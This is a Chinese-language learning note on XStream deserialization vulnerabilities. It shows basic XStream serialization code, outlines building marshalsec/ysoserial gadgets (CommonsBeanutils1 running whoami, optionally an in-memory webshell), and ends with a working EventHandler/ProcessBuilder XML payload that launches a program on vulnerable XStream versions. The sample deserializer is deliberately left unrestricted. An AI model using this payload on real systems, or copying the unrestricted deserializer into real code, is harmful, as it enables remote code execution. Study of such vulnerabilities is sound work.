xstream 相关漏洞学习

参考:

https://www.bbsmax.com/A/kmzLWkWBdG/  基本使用

https://blog.csdn.net/wenrennaoda/article/details/105564606 各版本漏洞触发原理

https://zhuanlan.zhihu.com/p/375239304

基本使用

xstream主要作用:类与XML互相转换

引入依赖

    <dependencies>
        <dependency>
            <groupId>com.thoughtworks.xstream</groupId>
            <artifactId>xstream</artifactId>
            <version>1.4.10</version>
        </dependency>
    </dependencies>

创建Student类

import java.io.Serializable;

/**
 * Simple data holder used throughout the XStream serialization examples.
 *
 * <p>Carries a numeric id, a name and a school, with a no-arg constructor,
 * an all-args constructor, plain getters/setters and a readable
 * {@link #toString()}. The {@link Serializable} marker is kept exactly as in
 * the original listing.
 */
public class Student implements Serializable {

    private int id;
    private String name;
    private String school;

    /** Creates a student whose fields keep their Java default values. */
    public Student() {
    }

    /**
     * Creates a fully populated student.
     *
     * @param id     numeric student id
     * @param name   student name (may be {@code null})
     * @param school school name (may be {@code null})
     */
    public Student(int id, String name, String school) {
        this.id = id;
        this.name = name;
        this.school = school;
    }

    /** @return the numeric student id */
    public int getId() {
        return this.id;
    }

    /** @param id the new numeric student id */
    public void setId(int id) {
        this.id = id;
    }

    /** @return the student name, possibly {@code null} */
    public String getName() {
        return this.name;
    }

    /** @param name the new student name */
    public void setName(String name) {
        this.name = name;
    }

    /** @return the school name, possibly {@code null} */
    public String getSchool() {
        return this.school;
    }

    /** @param school the new school name */
    public void setSchool(String school) {
        this.school = school;
    }

    /**
     * Renders the student as {@code Student [id=.., name=.., school=..]};
     * {@code null} fields are printed as the text "null".
     */
    @Override
    public String toString() {
        StringBuilder out = new StringBuilder("Student [id=");
        out.append(this.id)
           .append(", name=").append(this.name)
           .append(", school=").append(this.school)
           .append(']');
        return out.toString();
    }

}

测试SerializeXml类:数组类与XML互转

package com.ser.test;


import com.thoughtworks.xstream.XStream;

import java.io.FileInputStream;
import java.io.FileNotFoundException;
import java.io.FileOutputStream;
import java.io.IOException;

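/**
 * Round-trips a {@code Student[]} through XStream: writes the array to
 * {@code myObjtoXml.txt}, echoes the XML to stdout, then reads the file back
 * and prints each element.
 */
public class SerializeXml {
    /** Entry point: serialize first, then deserialize the file just written. */
    public static void main(String[] args) {
        serializeToXml();
        System.out.println("**************************************");
        deserialize();
    }

    /**
     * Serializes two sample students to {@code myObjtoXml.txt} and prints the
     * same XML to stdout.
     *
     * <p>The output stream is opened with try-with-resources so it is flushed
     * and closed even when {@code toXML} fails; the original listing never
     * closed it.
     */
    public static void serializeToXml() {
        Student stu1 = new Student(10003, "claire", "hh");
        Student stu2 = new Student(10004, "leafly", "niubi");

        Student[] students = {stu1, stu2};
        XStream xstream = new XStream();
        // Point the stream at the output file and let XStream write the array into it.
        try (FileOutputStream write = new FileOutputStream("myObjtoXml.txt")) {
            xstream.toXML(students, write);
        } catch (IOException e) {
            // Covers FileNotFoundException on open and any failure from close();
            // the stdout dump below still runs, as in the original best-effort flow.
            e.printStackTrace();
        }
        // Echo the serialized form to stdout.
        System.out.println(xstream.toXML(students));

    }

    /**
     * Reads {@code myObjtoXml.txt} back into a {@code Student[]} and prints
     * every element.
     *
     * <p>Security note: a bare {@code new XStream()} has no type restrictions,
     * so {@code fromXML} will instantiate whatever class names the document
     * asks for. This method must therefore never be given attacker-controlled
     * XML. In real code restrict the accepted types before deserializing, e.g.
     * {@code XStream.setupDefaultSecurity(xstream)} followed by
     * {@code xstream.allowTypes(new Class[]{Student.class})}. The call is left
     * unrestricted here only because this listing is the vulnerable test
     * harness that the article goes on to examine.
     */
    public static void deserialize() {
        XStream xstream = new XStream();

        // try-with-resources closes the input stream; the original leaked it.
        try (FileInputStream reader = new FileInputStream("myObjtoXml.txt")) {
            // Deserialize the XML file back into a Student array.
            Student[] students = (Student[]) xstream.fromXML(reader);
            if (students != null) {
                for (Student student : students) {
                    System.out.println(student);
                }
            }
        } catch (IOException e) {
            e.printStackTrace();
        }

    }
}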

运行后生成XML文件

<com.ser.test.Student-array>
  <com.ser.test.Student>
    <id>10003</id>
    <name>claire</name>
    <school>hh</school>
  </com.ser.test.Student>
  <com.ser.test.Student>
    <id>10004</id>
    <name>leafly</name>
    <school>niubi</school>
  </com.ser.test.Student>
</com.ser.test.Student-array>

测试SerializeXml类:单个类与XML互转

package com.ser.test;


import com.thoughtworks.xstream.XStream;

import java.io.FileInputStream;
import java.io.FileNotFoundException;
import java.io.FileOutputStream;
import java.io.IOException;

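/**
 * Round-trips a single {@code Student} through XStream: writes it to
 * {@code myObjtoXml.txt}, echoes the XML to stdout, then reads the file back
 * and prints the object.
 */
public class SerializeXml {
    /** Entry point: serialize first, then deserialize the file just written. */
    public static void main(String[] args) {
        serializeToXml();
        System.out.println("**************************************");
        deserialize();
    }

    /**
     * Serializes one sample student to {@code myObjtoXml.txt} and prints the
     * same XML to stdout.
     *
     * <p>The output stream is opened with try-with-resources so it is flushed
     * and closed even when {@code toXML} fails; the original listing never
     * closed it (and carried a stray empty statement after the constructor).
     */
    public static void serializeToXml() {
        Student stu1 = new Student(10003, "claire", "hh");
        XStream xstream = new XStream();
        // Point the stream at the output file and let XStream write the object into it.
        try (FileOutputStream write = new FileOutputStream("myObjtoXml.txt")) {
            xstream.toXML(stu1, write);
        } catch (IOException e) {
            // Covers FileNotFoundException on open and any failure from close();
            // the stdout dump below still runs, as in the original best-effort flow.
            e.printStackTrace();
        }
        // Echo the serialized form to stdout.
        System.out.println(xstream.toXML(stu1));

    }

    /**
     * Reads {@code myObjtoXml.txt} back into a {@code Student} and prints it.
     *
     * <p>Security note: a bare {@code new XStream()} has no type restrictions,
     * so {@code fromXML} will instantiate whatever class names the document
     * asks for. This method must therefore never be given attacker-controlled
     * XML. In real code restrict the accepted types before deserializing, e.g.
     * {@code XStream.setupDefaultSecurity(xstream)} followed by
     * {@code xstream.allowTypes(new Class[]{Student.class})}. The call is left
     * unrestricted here only because this listing is the vulnerable test
     * harness that the article goes on to examine.
     */
    public static void deserialize() {
        XStream xstream = new XStream();

        // try-with-resources closes the input stream; the original leaked it.
        try (FileInputStream reader = new FileInputStream("myObjtoXml.txt")) {
            Student stu1 = (Student) xstream.fromXML(reader);
            System.out.println(stu1);
        } catch (IOException e) {
            e.printStackTrace();
        }

    }
}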

生成XML如下:

<com.ser.test.Student>
  <id>10003</id>
  <name>claire</name>
  <school>hh</school>
</com.ser.test.Student>

探测URLDNSLOG

POC生成

IDEA导入marshalsec项目,将ysoserial引入依赖

找到想修改的gadgets,这里以CommonsBeanutils为例子

注释掉原有的生成 object 的逻辑,替换成调用 ys(ysoserial)的逻辑

直接保存,注释掉源代码中serializeToXml,直接反序列化,尝试解析 

 

生成依赖于CommonsBeanutils1直接执行命令的exp

如下,因为这里不需要借助 ldap 远程加载,所以顺着 ys 的 exp 生成逻辑写一遍代码,如目标的 gadgets 为 CommonsBeanutils1,执行 whoami 等;如果需要注入内存马,则替换对应的 ys 模块

其他EXP

基于EventHandler,版本要求:1.4.10 1.4.6 1.4.5

<sorted-set>
<string>foo</string>
<dynamic-proxy>
    <interface>java.lang.Comparable</interface>
    <handler class="java.beans.EventHandler">
        <target class="java.lang.ProcessBuilder">
            <command>
                <string>open</string>
                <string>/System/Applications/Calculator.app</string>
            </command>
        </target>
        <action>start</action>
    </handler>
</dynamic-proxy>
</sorted-set>

 

 
